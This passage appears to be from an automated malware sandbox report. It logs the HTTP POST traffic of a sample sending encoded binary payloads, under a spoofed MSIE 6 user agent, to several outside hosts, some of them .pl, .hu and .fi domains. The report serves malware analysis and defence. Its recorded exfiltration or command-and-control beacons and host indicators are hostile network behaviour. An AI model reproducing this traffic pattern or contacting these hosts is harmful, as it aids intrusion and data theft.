4c 74 69 78 30 6c 64 6f 52 54 48 77 76 48 4a 71 33 76 47 6b 43 55 76 6f 4d 54 34 63 59 59 6e 6a 58 79 54 4a 32 72 35 6b 61 75 6c 4e 7a 4e 57 49 69 76 66 76 76 6c 74 62 31 71 47 6a 48 46 50 6e 30 45 64 74 48 65 30 69 4f 48 54 53 2b 39 64 58 64 63 69 35 51 6c 33 4e 2b 4e 44 53 6d 6a 49 55 55 4e 30 45 44 63 35 56 69 4f 4b 55 6c 77 61 69 32 32 53 6e 44 6f 33 6d 53 50 46 56 4a 5a 47 52 45 4c 48 49 34 49 32 64 7a 69 5a 5a 55 53 76 6a 52 37 31 52 4f 55 4b 30 70 4e 33 51 49 4c 4f 5a 38 74 36 64 6c 65 31 4c 73 6b 33 66 59 39 67 46 73 75 34 62 54 42 39 4b 54 4b 70 6d 6e 66 5a 57 32 6c 43 61 61 54 37 4c 34 58 41 47 41 78 4c 78 56 49 62 6a 6c 59 4a 6b 75 68 6e 2b 74 38 63 7a 53 39 37 55 55 56 65 30 6d 61 79 4e 4c 7a 45 4a 2f 50 4f 70 59 2f 55 68 69 31 32 31 57 57 61 4e 72 4b 44 42 54 32 57 44 53 59 38 38 6d 4e 39 43 57 61 73 39 34 6f 38 39 6a 51 5a 49 46 69 4f 37 50 66 4d 56 75 51 6f 32 43 57 75 45 65 77 73 46 78 32 52 53 74 33 65 50 33 71 4e 5a 63 63 38 76 68 68 6a 4b 64 59 44 50 68 64 43 4d 6e 7a 63 4d 69 56 7a 42 35 36 6d 4c 62 69 31 6f 52 72 32 38 39 4a 5a 42 6d 4d 32 30 59 58 42 71 66 6e 75 41 37 53 37 45 59 32 55 54 77 5a 57 71 30 38 53 79 56 77 Data Ascii: O3ue3TsvM8h5PpYk0tucaCSJ+3dBqkIkn/R4pdoylDC7e6eFdrqg6OgJAHaJlKPCzfCABfGmcqc1/swYK/hlsrk+OtGjd9w+yWa0j10QPVvfrks2N7aWToEDMRJxhFiyBpSRWv1qIpJqPUo2aX2BPRLtix0ldoRTHwvHJq3vGkCUvoMT4cYYnjXyTJ2r5kaulNzNWIivfvvltb1qGjHFPn0EdtHe0iOHTS+9dXdci5Ql3N+NDSmjIUUN0EDc5ViOKUlwai22SnDo3mSPFVJZGRELHI4I2dziZZUSvjR71ROUK0pN3QILOZ8t6dle1Lsk3fY9gFsu4bTB9KTKpmnfZW2lCaaT7L4XAGAxLxVIbjlYJkuhn+t8czS97UUVe0mayNLzEJ/POpY/Uhi121WWaNrKDBT2WDSY88mN9CWas94o89jQZIFiO7PfMVuQo2CWuEewsFx2RSt3eP3qNZcc8vhhjKdYDPhdCMnzcMiVzB56mLbi1oRr289JZBmM20YXBqfnuA7S7EY2UTwZWq08SyVw
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 68 56 41 32 33 64 73 72 4d 38 67 6d 4f 4a 78 4f 38 6d 2f 6b 45 73 54 53 77 68 6c 68 59 37 2b 4e 50 32 4d 4b 71 75 6e 71 31 35 38 6e 48 44 45 52 39 4b 35 52 6f 49 56 30 32 38 31 57 37 34 6e 35 6f 4d 66 6c 77 44 46 58 36 43 47 31 30 72 76 55 37 6c 6e 42 51 73 6c 43 38 36 61 6d 37 4c 75 43 6b 53 34 47 52 4d 73 5a 6d 70 44 2b 54 71 5a 77 69 42 48 38 65 7a 2b 69 66 63 49 54 2f 70 66 46 66 57 38 7a 47 64 2f 6b 30 66 54 41 57 44 44 2f 36 4e 56 35 79 73 79 42 74 54 56 48 39 6b 4b 78 71 4f 70 79 64 77 78 55 32 52 41 77 58 71 4c 38 51 34 56 74 55 43 5a 33 4e 46 78 66 75 32 4f 75 4e 2f 75 6f 54 39 73 5a 4c 31 70 55 44 79 4c 44 70 31 72 73 62 2f 2f 52 6e 36 6c 58 6f 63 7a 58 6e 6b 6d 32 6b 4f 45 46 4f 35 33 4e 47 2b 6d 74 4a 77 6d 65 65 4a 66 6f 48 64 52 64 49 34 77 4f 74 44 4a 43 45 68 4b 6b 4f 76 6e 39 42 2b 41 6b 4c 56 2b 32 65 37 33 41 51 4b 56 44 42 68 4d 50 5a 37 78 73 35 63 37 58 73 38 36 42 71 56 76 6a 47 63 2b 31 35 74 48 2b 7a 4e 67 66 77 54 34 6f 61 46 6a 70 51 31 59 72 34 72 76 59 55 6f 50 74 69 52 2b 69 51 49 71 72 48 31 39 55 6c 6a 39 33 6f 53 64 75 4d 6a 73 71 36 54 70 56 68 6e 59 50 53 41 4c 79 4c 4a 4c 43 6b 63 73 6e 49 52 36 4b 4a 72 4f 61 41 76 63 56 75 61 62 48 50 4b 5a 6d 58 50 48 6a 41 4d 48 56 44 6a 31 62 6a 74 34 30 46 75 35 57 4e 6b 37 79 2f 59 41 41 43 6a 58 6c 66 79 77 35 38 2f 79 35 51 7a 55 4c 56 67 6c 48 4f 36 62 58 58 48 42 71 54 6e 72 68 7a 59 49 67 36 75 6b 58 34 31 4f 34 42 62 56 78 4d 64 30 6a 52 64 36 43 47 67 69 46 59 66 4d 52 68 6e 49 77 30 7a 59 6d 4d 74 59 66 58 78 34 69 36 68 66 66 32 79 4c 56 72 35 68 36 48 2f 69 64 32 5a 30 46 78 6b 79 4e 64 32 71 35 49 7a 49 2b 6b 6c 62 31 44 39 34 71 74 74 31 61 37 4d 77 56 39 49 47 44 75 61 34 7a 4a 4d 2b 45 38 5a 5a 54 64 4c 42 65 6a 49 6e 33 4a 48 6b 47 Data Ascii: hVA23dsrM8gmOJxO8m/kEsTSwhlhY7+NP2MKqunq158nHDER9K5RoIV0281W74n5oMflwDFX6CG10rvU7lnBQslC86am7LuCkS4GRMsZmpD+TqZwiBH8ez+ifcIT/pfFfW8zGd/k0fTAWDD/6NV5ysyBtTVH9kKxqOpydwxU2RAwXqL8Q4VtUCZ3NFxfu2OuN/uoT9sZL1pUDyLDp1rsb//Rn6lXoczXnkm2kOEFO53NG+mtJwmeeJfoHdRdI4wOtDJCEhKkOvn9B+AkLV+2e73AQKVDBhMPZ7xs5c7Xs86BqVvjGc+15tH+zNgfwT4oaFjpQ1Yr4rvYUoPtiR+iQIqrH19Ulj93oSduMjsq6TpVhnYPSALyLJLCkcsnIR6KJrOaAvcVuabHPKZmXPHjAMHVDj1bjt40Fu5WNk7y/YAACjXlfyw58/y5QzULVglHO6bXXHBqTnrhzYIg6ukX41O4BbVxMd0jRd6CGgiFYfMRhnIw0zYmMtYfXx4i6hff2yLVr5h6H/id2Z0FxkyNd2q5IzI+klb1D94qtt1a7MwV9IGDua4zJM+E8ZZTdLBejIn3JHkG
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 63 65 6e 42 49 46 70 64 4e 63 67 73 5a 63 2f 33 66 59 77 67 79 4a 30 6a 78 79 46 4b 75 43 75 54 4c 73 33 35 67 63 6e 78 6f 4f 72 53 39 6f 56 6e 65 7a 59 4d 4a 35 61 43 48 54 2b 4d 64 4f 35 34 38 69 48 57 4d 35 52 4b 65 6e 62 65 42 58 47 51 62 55 73 67 50 58 76 65 47 55 33 58 73 7a 78 72 37 49 43 68 43 64 4d 7a 56 70 76 70 41 6b 4c 78 57 48 52 4a 49 73 58 66 65 58 6c 33 31 53 4c 41 74 6c 43 72 2f 68 77 48 4e 69 4a 50 75 35 72 49 34 35 31 58 78 4d 48 34 31 71 61 36 62 77 4c 53 4d 38 77 4a 46 4f 43 50 65 67 70 5a 6e 68 4b 46 62 6d 72 50 32 53 52 4b 71 49 35 79 5a 4b 73 4c 64 63 65 72 4d 5a 6e 64 6d 69 53 4a 75 2b 37 45 54 78 42 39 4a 41 66 32 4d 4e 74 59 48 2b 54 53 4a 4e 32 4d 6d 48 66 7a 35 46 51 2f 59 56 79 4d 49 6a 69 57 34 6b 56 74 49 46 49 38 38 32 59 6e 71 31 62 6c 35 4f 36 4c 47 37 67 76 7a 52 49 73 4b 79 37 41 67 45 58 43 68 58 53 53 57 35 49 59 79 6f 58 77 45 43 34 63 67 30 76 39 31 6a 6c 54 57 77 54 2f 47 62 6f 4d 43 76 76 61 4f 6b 6f 67 34 6f 33 47 4b 33 68 58 6b 59 6a 64 7a 41 69 4b 4a 50 74 6c 5a 53 54 58 4e 35 33 56 47 6e 2f 34 38 45 55 4c 76 57 74 77 46 64 34 47 51 39 70 4d 6e 55 76 4f 4e 41 51 52 4a 37 4d 48 2b 4c 31 6b 55 70 6c 43 5a 39 48 2f 7a 2f 35 6c 43 36 30 74 72 62 4c 6b 4c 64 66 69 48 59 57 38 5a 39 73 35 31 47 52 72 45 7a 73 53 33 78 52 4f 65 6c 41 70 6b 79 66 4e 66 6d 4a 42 54 50 31 76 51 39 37 51 52 52 7a 4f 66 36 50 59 64 66 79 74 32 53 6a 6f 48 51 52 55 58 47 5a 59 6a 5a 66 41 7a 36 38 42 53 43 48 32 63 6b 42 6c 74 36 37 6a 37 47 70 48 35 75 65 73 68 77 6b 6c 76 57 5a 74 4c 57 75 59 66 6c 7a 4b 73 46 70 51 7a 32 75 37 65 44 38 33 51 43 34 3d Data Ascii: cenBIFpdNcgsZc/3fYwgyJ0jxyFKuCuTLs35gcnxoOrS9oVnezYMJ5aCHT+MdO548iHWM5RKenbeBXGQbUsgPXveGU3Xszxr7IChCdMzVpvpAkLxWHRJIsXfeXl31SLAtlCr/hwHNiJPu5rI451XxMH41qa6bwLSM8wJFOCPegpZnhKFbmrP2SRKqI5yZKsLdcerMZndmiSJu+7ETxB9JAf2MNtYH+TSJN2MmHfz5FQ/YVyMIjiW4kVtIFI882Ynq1bl5O6LG7gvzRIsKy7AgEXChXSSW5IYyoXwEC4cg0v91jlTWwT/GboMCvvaOkog4o3GK3hXkYjdzAiKJPtlZSTXN53VGn/48EULvWtwFd4GQ9pMnUvONAQRJ7MH+L1kUplCZ9H/z/5lC60trbLkLdfiHYW8Z9s51GRrEzsS3xROelApkyfNfmJBTP1vQ97QRRzOf6PYdfyt2SjoHQRUXGZYjZfAz68BSCH2ckBlt67j7GpH5ueshwklvWZtLWuYflzKsFpQz2u7eD83QC4=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 50 66 43 7a 36 73 52 4c 4b 38 68 59 58 32 45 2f 33 2b 54 31 44 4a 65 66 2f 79 6e 38 33 39 6d 61 4f 4c 32 42 30 50 6c 72 6a 52 70 42 4d 56 33 48 56 73 48 4e 37 4e 51 68 74 50 68 55 64 6f 4c 55 54 71 75 61 46 71 48 52 53 58 76 69 4a 65 7a 54 42 6e 78 4f 52 76 44 35 72 36 56 32 6d 4a 78 59 39 2b 78 73 49 68 61 71 70 59 39 66 32 6f 41 57 55 4a 7a 78 55 2f 64 37 73 36 50 42 50 48 76 4b 75 43 59 2f 65 42 45 6c 37 58 30 34 71 56 38 79 44 69 6e 4a 58 37 47 46 62 73 63 57 5a 4c 7a 67 32 72 6f 79 66 70 47 6d 64 53 67 55 74 64 67 43 74 7a 4a 6f 6e 61 2f 42 72 6e 6d 4f 2f 4f 4d 54 72 51 67 6c 43 6b 6f 77 36 72 7a 30 42 35 77 78 2f 4f 65 69 7a 6d 76 44 36 48 2f 79 62 47 58 78 53 31 44 2f 70 35 77 73 51 2f 53 75 30 63 52 57 38 6e 63 5a 52 7a 4a 70 74 34 4b 58 6f 62 31 38 34 57 79 50 78 4f 41 68 71 6a 58 6b 6e 59 31 55 4a 36 6e 49 6a 66 54 69 50 36 62 72 67 44 79 79 58 67 58 35 5a 59 50 78 42 66 38 54 7a 54 6f 64 61 4a 54 39 73 35 74 72 52 58 4e 42 51 4c 32 32 37 72 32 4a 4e 69 78 33 59 49 32 32 4a 58 51 6e 7a 62 62 52 54 43 79 34 64 49 63 79 44 59 6c 6d 7a 4d 53 51 71 48 4b 72 4b 4e 4d 77 4c 59 6a 36 79 73 4d 2f 47 34 76 36 79 6a 33 30 4b 30 39 45 53 30 4c 52 4d 59 57 39 73 6d 32 2b 50 74 4e 73 59 73 51 35 4a 62 38 74 39 66 65 32 37 45 6c 6e 4c 6d 38 39 2b 47 75 48 73 33 6c 63 69 2f 64 56 46 63 63 6e 43 38 38 6a 6d 2b 69 49 67 44 62 71 65 41 42 6b 35 76 63 51 53 56 77 4e 74 2f 2f 30 42 49 45 69 56 56 51 47 35 59 45 34 7a 48 37 30 35 6e 6d 47 2b 6e 74 36 6f 53 37 65 31 31 64 2f 4c 65 43 66 48 2f 68 34 4f 6a 4a 44 35 31 51 49 4a 7a 66 2f 46 6f 62 52 36 6b 30 75 49 66 30 77 76 69 38 32 4a 53 52 7a 33 75 59 4e 30 30 38 69 56 56 6d 31 71 7a 66 4a 44 6f 51 59 56 30 6c 68 72 41 3d 3d Data Ascii: PfCz6sRLK8hYX2E/3+T1DJef/yn839maOL2B0PlrjRpBMV3HVsHN7NQhtPhUdoLUTquaFqHRSXviJezTBnxORvD5r6V2mJxY9+xsIhaqpY9f2oAWUJzxU/d7s6PBPHvKuCY/eBEl7X04qV8yDinJX7GFbscWZLzg2royfpGmdSgUtdgCtzJona/BrnmO/OMTrQglCkow6rz0B5wx/OeizmvD6H/ybGXxS1D/p5wsQ/Su0cRW8ncZRzJpt4KXob184WyPxOAhqjXknY1UJ6nIjfTiP6brgDyyXgX5ZYPxBf8TzTodaJT9s5trRXNBQL227r2JNix3YI22JXQnzbbRTCy4dIcyDYlmzMSQqHKrKNMwLYj6ysM/G4v6yj30K09ES0LRMYW9sm2+PtNsYsQ5Jb8t9fe27ElnLm89+GuHs3lci/dVFccnC88jm+iIgDbqeABk5vcQSVwNt//0BIEiVVQG5YE4zH705nmG+nt6oS7e11d/LeCfH/h4OjJD51QIJzf/FobR6k0uIf0wvi82JSRz3uYN008iVVm1qzfJDoQYV0lhrA==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 50 6f 66 41 4b 56 33 34 50 63 67 61 64 79 75 57 6c 4a 36 65 57 5a 61 49 30 6d 77 4c 54 78 63 76 34 55 34 6a 71 67 76 6e 65 59 7a 53 7a 4f 39 38 57 78 52 79 39 4c 31 77 5a 67 42 4f 51 5a 51 64 37 35 67 77 62 64 62 6c 6f 79 79 74 37 6b 41 54 65 4f 4c 53 4e 35 6f 66 74 78 64 75 76 38 56 4e 33 61 74 48 79 4e 64 69 4f 67 49 44 7a 68 6b 75 67 4e 7a 7a 2f 67 44 51 73 62 42 4c 43 6b 47 65 2f 69 4c 4d 2f 72 31 32 68 73 6b 31 5a 72 32 72 7a 4a 73 55 32 70 4a 6d 62 6c 78 38 38 68 7a 52 6a 57 70 7a 34 50 74 6a 67 4c 4c 2f 74 33 52 68 47 39 67 56 37 7a 52 71 31 44 6a 61 42 68 32 44 77 4c 50 35 4b 54 4d 45 69 31 35 2f 2f 57 46 74 4e 65 53 4c 46 66 50 61 64 43 51 6a 36 35 62 69 6d 57 41 5a 54 54 4f 7a 38 6c 4b 33 31 66 39 69 5a 41 55 37 71 4f 61 68 78 59 6d 4a 4c 37 4b 74 4e 48 75 4c 68 4a 50 67 49 73 74 70 5a 33 76 56 4d 6b 4f 44 71 75 73 66 38 4d 58 53 48 4f 41 73 72 52 70 6a 78 36 4a 61 77 55 2b 6b 54 6a 31 65 69 50 42 67 58 6d 71 47 71 37 61 4b 64 38 72 2f 32 32 4e 46 6e 2b 30 64 30 44 32 61 6a 59 6f 46 4c 6a 4e 7a 36 51 45 59 76 2b 73 41 68 77 30 38 59 76 44 5a 4a 62 35 55 39 50 49 6f 57 73 53 64 42 48 4b 39 50 32 53 6b 56 33 45 68 50 7a 79 58 55 77 44 38 79 56 48 45 31 46 53 53 49 5a 50 42 37 69 71 71 4a 59 75 74 79 4f 63 39 5a 50 4a 75 64 51 43 76 4c 38 4b 31 6d 6e 54 31 50 6d 4c 32 50 47 46 33 52 42 54 55 42 33 6c 76 52 61 67 61 71 48 34 46 6d 51 31 45 72 64 78 41 71 74 63 4b 64 6e 2f 76 38 63 63 70 70 47 35 61 70 4e 61 62 2b 56 6d 34 34 35 59 73 5a 69 43 6d 6b 47 31 51 48 75 4e 43 30 59 5a 49 74 4b 47 73 57 67 2f 67 39 4c 79 68 6d 74 57 69 2f 79 44 64 49 5a 6a 70 52 54 66 45 Data Ascii: PofAKV34PcgadyuWlJ6eWZaI0mwLTxcv4U4jqgvneYzSzO98WxRy9L1wZgBOQZQd75gwbdbloyyt7kATeOLSN5oftxduv8VN3atHyNdiOgIDzhkugNzz/gDQsbBLCkGe/iLM/r12hsk1Zr2rzJsU2pJmblx88hzRjWpz4PtjgLL/t3RhG9gV7zRq1DjaBh2DwLP5KTMEi15//WFtNeSLFfPadCQj65bimWAZTTOz8lK31f9iZAU7qOahxYmJL7KtNHuLhJPgIstpZ3vVMkODqusf8MXSHOAsrRpjx6JawU+kTj1eiPBgXmqGq7aKd8r/22NFn+0d0D2ajYoFLjNz6QEYv+sAhw08YvDZJb5U9PIoWsSdBHK9P2SkV3EhPzyXUwD8yVHE1FSSIZPB7iqqJYutyOc9ZPJudQCvL8K1mnT1PmL2PGF3RBTUB3lvRagaqH4FmQ1ErdxAqtcKdn/v8ccppG5apNab+Vm445YsZiCmkG1QHuNC0YZItKGsWg/g9LyhmtWi/yDdIZjpRTfE
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 78 68 2f 6d 4a 2f 62 6f 50 63 67 31 58 73 2b 75 55 63 74 72 30 70 6c 5a 74 38 63 57 51 68 56 68 69 75 53 47 74 5a 4a 75 38 54 68 32 75 38 69 6b 55 61 51 39 79 6b 41 5a 53 6b 56 6e 38 75 56 65 4a 4c 4e 76 76 31 6d 41 5a 58 78 57 61 48 39 32 35 49 6a 44 72 58 41 57 63 37 4b 31 47 78 52 32 6e 47 72 41 72 4d 43 58 77 7a 6a 67 70 6f 72 71 66 59 50 6d 51 64 73 56 54 71 4f 71 56 4a 2f 63 74 7a 70 45 2b 6d 4b 31 49 38 75 36 6a 76 64 2b 47 78 34 7a 42 54 47 54 77 67 37 35 4c 4a 6d 69 58 45 56 76 51 50 46 4d 55 46 35 31 50 57 64 62 55 42 62 78 74 4b 68 7a 7a 61 57 64 53 78 76 4b 68 55 43 59 54 41 77 4f 70 55 58 74 65 79 6a 48 50 35 48 44 32 31 72 63 72 73 67 78 6b 59 4b 72 38 2f 38 45 6b 42 44 41 77 4f 65 72 4e 62 64 55 50 5a 77 6d 55 6d 45 76 61 43 34 4a 6d 53 57 6b 59 64 4f 6e 74 2f 66 68 6b 38 36 61 58 61 59 47 61 33 7a 55 64 37 57 4f 77 7a 74 4d 52 4b 72 4d 51 72 4d 71 31 58 66 30 61 57 32 48 4e 70 76 7a 74 65 6f 45 50 57 54 67 34 6a 2f 78 33 38 73 51 6e 66 61 35 38 61 67 36 58 51 52 47 73 62 37 6a 59 6f 66 6a 39 53 51 6f 70 6b 71 32 41 43 56 38 53 67 37 47 7a 63 4b 76 59 2b 45 76 67 4c 76 4b 59 31 63 32 4e 69 4f 45 41 47 6c 33 44 65 41 33 73 2f 2b 46 50 35 73 2b 2f 45 35 72 53 70 6c 74 7a 6d 6f 68 49 52 36 46 58 69 76 4d 51 6b 41 67 31 38 4d 61 37 48 47 32 69 30 2b 69 66 61 6b 7a 66 44 79 75 6a 43 2f 49 31 34 30 58 6d 47 2f 6f 73 49 2b 6e 4d 66 4f 65 46 6c 44 50 53 57 6a 65 77 63 55 2f 66 72 52 6c 54 44 43 4a 61 2b 71 76 67 78 6c 73 63 42 78 4c 62 64 53 7a 41 4a 65 64 43 6c 39 48 7a 45 61 44 6b 6b 73 41 67 37 65 76 43 62 2f 45 55 71 31 36 68 76 4c 50 45 63 6f 55 41 71 4c 70 59 50 69 49 34 76 56 4b Data Ascii: xh/mJ/boPcg1Xs+uUctr0plZt8cWQhVhiuSGtZJu8Th2u8ikUaQ9ykAZSkVn8uVeJLNvv1mAZXxWaH925IjDrXAWc7K1GxR2nGrArMCXwzjgporqfYPmQdsVTqOqVJ/ctzpE+mK1I8u6jvd+Gx4zBTGTwg75LJmiXEVvQPFMUF51PWdbUBbxtKhzzaWdSxvKhUCYTAwOpUXteyjHP5HD21rcrsgxkYKr8/8EkBDAwOerNbdUPZwmUmEvaC4JmSWkYdOnt/fhk86aXaYGa3zUd7WOwztMRKrMQrMq1Xf0aW2HNpvzteoEPWTg4j/x38sQnfa58ag6XQRGsb7jYofj9SQopkq2ACV8Sg7GzcKvY+EvgLvKY1c2NiOEAGl3DeA3s/+FP5s+/E5rSpltzmohIR6FXivMQkAg18Ma7HG2i0+ifakzfDyujC/I140XmG/osI+nMfOeFlDPSWjewcU/frRlTDCJa+qvgxlscBxLbdSzAJedCl9HzEaDkksAg7evCb/EUq16hvLPEcoUAqLpYPiI4vVK
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 48 44 4d 44 4b 58 56 43 52 73 69 2b 71 50 4b 71 33 50 48 6e 34 32 34 57 4c 4d 6f 44 58 36 63 50 65 53 34 4a 42 2f 69 56 55 43 4a 59 31 74 44 6e 41 70 4b 6e 65 7a 44 49 34 79 4c 6c 55 55 57 4b 34 49 58 7a 74 77 6a 58 39 35 64 77 62 78 6c 38 4e 6b 63 62 6d 6d 54 79 78 38 64 66 53 2b 64 4b 43 52 50 4b 46 6e 36 65 42 64 34 79 43 79 46 38 67 6a 45 51 4e 2b 65 72 6e 33 47 71 76 4d 62 70 33 50 50 79 73 65 2b 64 73 45 47 41 62 70 66 30 45 53 57 48 63 2b 75 50 72 2b 58 50 36 45 55 64 61 4f 58 49 69 6b 34 73 35 45 37 35 77 53 53 4d 57 79 55 7a 66 67 39 6d 79 79 42 33 70 41 79 6d 77 6f 50 48 32 46 64 6d 42 54 4c 37 72 6f 72 43 35 53 72 50 6b 34 49 61 66 6d 74 79 45 44 41 34 43 6c 36 56 4e 65 70 66 31 45 37 6d 49 4a 2f 6d 37 7a 68 42 5a 64 67 6b 6a 7a 65 69 7a 73 72 79 4f 36 49 78 6a 65 66 76 52 33 57 45 71 51 6d 59 61 49 52 37 68 42 6c 6a 2b 42 52 57 6d 35 71 34 49 45 32 64 79 57 38 64 77 63 73 6a 61 74 45 53 61 59 51 57 4b 6c 58 63 69 5a 4a 76 71 4e 2f 75 55 76 56 6f 65 50 38 52 50 67 57 66 41 6c 31 6e 69 50 42 77 52 69 37 4f 65 5a 59 75 36 67 55 47 57 6f 53 4a 4f 68 4f 79 63 58 2f 48 50 77 68 66 78 65 79 4e 4e 2b 62 78 6e 39 47 66 2b 6a 68 43 52 70 32 4f 4d 47 67 58 69 54 76 52 4f 63 4b 66 6d 78 7a 78 5a 6b 62 76 73 79 54 58 78 72 6b 73 57 68 49 72 4f 4d 57 56 58 44 62 6f 37 65 78 6b 35 50 53 69 6f 45 45 52 70 37 41 7a 6a 34 78 48 74 71 67 72 64 44 6b 75 35 6a 48 4c 4f 35 49 66 42 53 53 71 52 6b 4a 67 66 6f 31 52 31 41 33 66 66 6f 41 32 64 76 36 79 42 70 54 72 72 52 78 68 33 5a 2b 33 31 63 66 56 4a 5a 66 54 37 55 74 43 64 56 69 49 39 76 67 54 6e 52 46 6a 57 74 51 5a 42 6e 62 67 54 47 71 42 4c 55 74 4f 46 4a 39 69 33 70 4b 7a 37 51 3d 3d Data Ascii: HDMDKXVCRsi+qPKq3PHn424WLMoDX6cPeS4JB/iVUCJY1tDnApKnezDI4yLlUUWK4IXztwjX95dwbxl8NkcbmmTyx8dfS+dKCRPKFn6eBd4yCyF8gjEQN+ern3GqvMbp3PPyse+dsEGAbpf0ESWHc+uPr+XP6EUdaOXIik4s5E75wSSMWyUzfg9myyB3pAymwoPH2FdmBTL7rorC5SrPk4IafmtyEDA4Cl6VNepf1E7mIJ/m7zhBZdgkjzeizsryO6IxjefvR3WEqQmYaIR7hBlj+BRWm5q4IE2dyW8dwcsjatESaYQWKlXciZJvqN/uUvVoeP8RPgWfAl1niPBwRi7OeZYu6gUGWoSJOhOycX/HPwhfxeyNN+bxn9Gf+jhCRp2OMGgXiTvROcKfmxzxZkbvsyTXxrksWhIrOMWVXDbo7exk5PSioEERp7Azj4xHtqgrdDku5jHLO5IfBSSqRkJgfo1R1A3ffoA2dv6yBpTrrRxh3Z+31cfVJZfT7UtCdViI9vgTnRFjWtQZBnbgTGqBLUtOFJ9i3pKz7Q==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 48 44 4d 44 4b 58 56 43 52 73 69 2b 71 50 4b 71 33 50 48 6e 34 32 34 57 4c 4d 6f 44 58 36 63 50 65 53 34 4a 42 2f 69 56 55 43 4a 59 31 74 44 6e 41 70 4b 6e 65 7a 44 49 34 79 4c 6c 55 55 57 4b 34 49 58 7a 74 77 6a 58 39 35 64 77 62 78 6c 38 4e 6b 63 62 6d 6d 54 79 78 38 64 66 53 2b 64 4b 43 52 50 4b 46 6e 36 65 42 64 34 79 43 79 46 38 67 6a 45 51 4e 2b 65 72 6e 33 47 71 76 4d 62 70 33 50 50 79 73 65 2b 64 73 45 47 41 62 70 66 30 45 53 57 48 63 2b 75 50 72 2b 58 50 36 45 55 64 61 4f 58 49 69 6b 34 73 35 45 37 35 77 53 53 4d 57 79 55 7a 66 67 39 6d 79 79 42 33 70 41 79 6d 77 6f 50 48 32 46 64 6d 42 54 4c 37 72 6f 72 43 35 53 72 50 6b 34 49 61 66 6d 74 79 45 44 41 34 43 6c 36 56 4e 65 70 66 31 45 37 6d 49 4a 2f 6d 37 7a 68 42 5a 64 67 6b 6a 7a 65 69 7a 73 72 79 4f 36 49 78 6a 65 66 76 52 33 57 45 71 51 6d 59 61 49 52 37 68 42 6c 6a 2b 42 52 57 6d 35 71 34 49 45 32 64 79 57 38 64 77 63 73 6a 61 74 45 53 61 59 51 57 4b 6c 58 63 69 5a 4a 76 71 4e 2f 75 55 76 56 6f 65 50 38 52 50 67 57 66 41 6c 31 6e 69 50 42 77 52 69 37 4f 65 5a 59 75 36 67 55 47 57 6f 53 4a 4f 68 4f 79 63 58 2f 48 50 77 68 66 78 65 79 4e 4e 2b 62 78 6e 39 47 66 2b 6a 68 43 52 70 32 4f 4d 47 67 58 69 54 76 52 4f 63 4b 66 6d 78 7a 78 5a 6b 62 76 73 79 54 58 78 72 6b 73 57 68 49 72 4f 4d 57 56 58 44 62 6f 37 65 78 6b 35 50 53 69 6f 45 45 52 70 37 41 7a 6a 34 78 48 74 71 67 72 64 44 6b 75 35 6a 48 4c 4f 35 49 66 42 53 53 71 52 6b 4a 67 66 6f 31 52 31 41 33 66 66 6f 41 32 64 76 36 79 42 70 54 72 72 52 78 68 33 5a 2b 33 31 63 66 56 4a 5a 66 54 37 55 74 43 64 56 69 49 39 76 67 54 6e 52 46 6a 57 74 51 5a 42 6e 62 67 54 47 71 42 4c 55 74 4f 46 4a 39 69 33 70 4b 7a 37 51 3d 3d Data Ascii: HDMDKXVCRsi+qPKq3PHn424WLMoDX6cPeS4JB/iVUCJY1tDnApKnezDI4yLlUUWK4IXztwjX95dwbxl8NkcbmmTyx8dfS+dKCRPKFn6eBd4yCyF8gjEQN+ern3GqvMbp3PPyse+dsEGAbpf0ESWHc+uPr+XP6EUdaOXIik4s5E75wSSMWyUzfg9myyB3pAymwoPH2FdmBTL7rorC5SrPk4IafmtyEDA4Cl6VNepf1E7mIJ/m7zhBZdgkjzeizsryO6IxjefvR3WEqQmYaIR7hBlj+BRWm5q4IE2dyW8dwcsjatESaYQWKlXciZJvqN/uUvVoeP8RPgWfAl1niPBwRi7OeZYu6gUGWoSJOhOycX/HPwhfxeyNN+bxn9Gf+jhCRp2OMGgXiTvROcKfmxzxZkbvsyTXxrksWhIrOMWVXDbo7exk5PSioEERp7Azj4xHtqgrdDku5jHLO5IfBSSqRkJgfo1R1A3ffoA2dv6yBpTrrRxh3Z+31cfVJZfT7UtCdViI9vgTnRFjWtQZBnbgTGqBLUtOFJ9i3pKz7Q==
